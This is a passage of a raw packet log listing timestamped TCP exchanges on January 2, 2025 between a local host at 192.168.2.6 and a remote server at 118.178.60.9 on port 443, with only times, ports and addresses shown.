Jan 2, 2025 12:15:23.292886019 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.292965889 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.292968988 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.292979956 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.293013096 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.293023109 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.297163963 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.297233105 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.301418066 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.301512003 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.301578999 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.301631927 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.305892944 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.305926085 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.305958986 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.305982113 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.305995941 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.306041956 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.312192917 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.312289000 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.312371969 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.312427998 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.316760063 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.316823959 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.321078062 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.323046923 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.323103905 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.323153019 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.323163033 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.323189020 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.323210955 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.326168060 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.351083994 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.351231098 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.372980118 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.411055088 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.411155939 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.413249016 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.413312912 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.415414095 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.415482998 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.419919014 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.419987917 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.421952963 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.422008038 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.426403999 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.426460028 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.428625107 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.428685904 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.430882931 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.430946112 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.435355902 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.435424089 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.437382936 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.437448978 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.441737890 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.441809893 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.444037914 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.444132090 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.448229074 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.448286057 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.450289011 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.450351954 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.452555895 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.452614069 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.456872940 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.456928015 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.459271908 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.459343910 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.463505983 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.463568926 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.463989019 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.464046001 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.465342045 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.465399027 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.467940092 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.467998981 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.469240904 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.469307899 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.471889019 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.471951962 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.473217964 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.473280907 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.475840092 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.475928068 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.477143049 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.477209091 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.478550911 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.478606939 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.481045008 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.481231928 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.482433081 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.482495070 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.484955072 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.485025883 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.486396074 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.486464024 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.487565041 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.487627983 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.502839088 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.502885103 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.502909899 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.502923965 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.502945900 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.503026962 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.508619070 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.508657932 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.508682013 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.508687973 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.508713007 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.508733034 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.516326904 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.516386986 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.516503096 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.516554117 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.518975019 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.519015074 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.519032955 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.519038916 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.519064903 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.519083977 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.525327921 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.525383949 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.525515079 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.525567055 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.531961918 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.532012939 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.536596060 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.536632061 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.536655903 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.536680937 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.536699057 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.536722898 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.542818069 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.542886019 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.542922020 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.542990923 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.549366951 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.549405098 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.549448967 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.549458981 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.549472094 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.549496889 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.556103945 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.556134939 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.556193113 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.556200981 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.556210995 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.556246996 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.558995008 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.559055090 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.559056044 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.559067011 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.559115887 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.561757088 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.561813116 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.561829090 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.561880112 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.565675974 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.565716028 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.565720081 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.565725088 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.565762043 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.569562912 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.569607019 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.569670916 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.569726944 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.573487043 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.573553085 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.573566914 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.573611975 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.577328920 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.577380896 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.577480078 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.577528000 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.595149040 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.595195055 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.595226049 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.595232010 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.595251083 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.595271111 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.601001024 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.601052999 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.601118088 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.601172924 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.608717918 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.608757973 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.608768940 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.608772993 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.608797073 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.608810902 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.611506939 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.611542940 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.611562014 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.611566067 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.611588955 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.611608028 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.617739916 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.617796898 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.617935896 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.617985010 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.624586105 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.624625921 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.624644995 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.624649048 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.624674082 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.624692917 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.628856897 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.628914118 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.629003048 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.629051924 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.635284901 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.635325909 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.635360956 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.635366917 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.635377884 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.635405064 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.641798019 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.641846895 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.641900063 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.641942024 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.648544073 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.648580074 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.648606062 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.648612022 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.648636103 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.648654938 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.651498079 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.651556969 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.651616096 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.651665926 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.654222965 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.654278994 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.654299974 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.654305935 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.654329062 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.654341936 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.658077955 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.658148050 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.658210993 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.658261061 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.662065029 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.662122965 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.662204981 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.662254095 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.665898085 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.665962934 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.666057110 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.666105032 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.669876099 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.669914961 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.669958115 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.669969082 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.669985056 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.670011997 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.687738895 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.687774897 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.687860012 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.687870026 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.688072920 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.693548918 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.693592072 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.693640947 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.693685055 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.701208115 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.701275110 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.701351881 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.701395035 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.703202963 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.703799963 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.703850031 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.703950882 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.703994989 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.710122108 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.710170984 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.710218906 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.710305929 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.716928959 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.716983080 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.716995955 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.717041016 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.721410990 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.721472979 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.721497059 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.721539021 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.727699995 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.727741957 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.727756023 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.727765083 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.727782965 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.727802992 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.734280109 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.734323025 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.734338045 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.734347105 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.734364033 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.734379053 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.735519886 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.740922928 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.740981102 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.741101980 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.741152048 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.743882895 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.743931055 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.744014025 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.744060040 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.746691942 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.746741056 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.746742010 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.746763945 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.746783018 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.746797085 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.750588894 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.750622034 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.750667095 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.750673056 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.750694036 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.750710011 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.754502058 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.754554033 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.754601955 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.754641056 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.758410931 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.758459091 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.758549929 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.758599997 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.762228012 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.762288094 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.762418985 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.762459040 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.780066967 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.780102015 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.780133963 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.780147076 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.780165911 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.780190945 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.785990953 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.786047935 CET	49995	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:23.786113024 CET	443	49995	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:23.786154985 CET	49995	443	192.168.2.6	118.178.60.9
